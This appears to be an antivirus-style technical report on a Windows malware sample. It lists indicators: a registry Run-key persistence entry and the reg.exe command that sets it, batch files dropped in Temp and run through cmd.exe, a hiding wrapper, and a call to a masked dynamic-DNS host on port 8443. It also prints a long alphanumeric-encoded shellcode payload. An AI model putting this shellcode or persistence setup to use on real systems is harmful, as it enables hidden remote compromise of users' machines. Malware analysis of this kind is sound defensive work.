Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'shellcod' = '%WINDIR%\temp\avvio.bat'
- %WINDIR%\Temp\shellcod.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlM8LIEPEPEPCPMYZETqIBE4NkPRTpLKPRVlLKRrTTLKCBGXVoOGPJVFP1KOVQO0NLGLE1CLC2VLEpO1XOVmGqO7XbZPQBQGNkRrTPLKRbGLVaZpNkG0QhLEIPT4QZC1ZpPPNkRhGhNkQHEpVaN3KSGLG9LKTtLKGqZvVQIoEaO0NLKqXOVmEQKwEhIpCEL4C3CMIhEkCMEtT5IrQHLKQHVDEQKcRFLKVlRkLKV8ELC1ZsLKVdNkGqN0MYCtVDGTCkQKQqV9CjRqKOM0V8CoQJNkEBXkK6CmQxRNE5T4EPCXT7PiRNPiNiXfV4QxRlQgTfEWKOZuVQIoQGRwPWQGRvRHVZQFCII7KOZuXkQOCkTqO9V1PQQzVcRqCaPhKKQ0C0EPV3RpQxV7LIMOZfKOIEZKQXCiVQKbPRCXC0TrM0LDRrPRRrPQQBPPCXZKCeVNGKIoXUOyZfQzC2CkP1KOCgRwPWQGQFCXVMC6TXQkIoKeLEKpPuVNRkRTQ4E8K0TsGpEPMYM0CZVdV0PjEOCfPhCERfMNNfKON5ZKIEXkRiKXOCKOKOKOVOG1QyV6PVGEC0CXL0MeLbV6IoZuPjQPRHEPR0EPEPE8C0C0CpC0V7CXPXI4PSXeKOXUMCCcRsOyIwCgPhEPEpC0EPRsQFE8R2OfNiIrKOZuLEO0PtZmLKC7EQZcK5KpCEZEPXZcKXV1IoIoKORMRYRHPoCCCDCCPeT2RVPiE3CUVNRZE1T0PtPoVNPoT2QwEPAA
- %WINDIR%\Temp\hide_cmd.exe shellcod.bat avvio.bat
- <SYSTEM32>\cmd.exe /c avvio.bat
- <SYSTEM32>\cmd.exe /c shellcod.bat
- <SYSTEM32>\cmd.exe /c """%TEMP%\ger.bat"" "
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "shellcod" /t REG_SZ /d "%WINDIR%\temp\avvio.bat" /f
- %WINDIR%\Temp\shellcod.exe
- %WINDIR%\Temp\avvio.bat
- %WINDIR%\Temp\hide_cmd.exe
- %WINDIR%\Temp\shellcod.bat
- %TEMP%\shellcodE
- %TEMP%\ger.bat
- %TEMP%\avvio
- %TEMP%\shellcod
- %TEMP%\hide_cmd
- 'my#####ervice.zapto.org':8443
- DNS ASK my#####ervice.zapto.org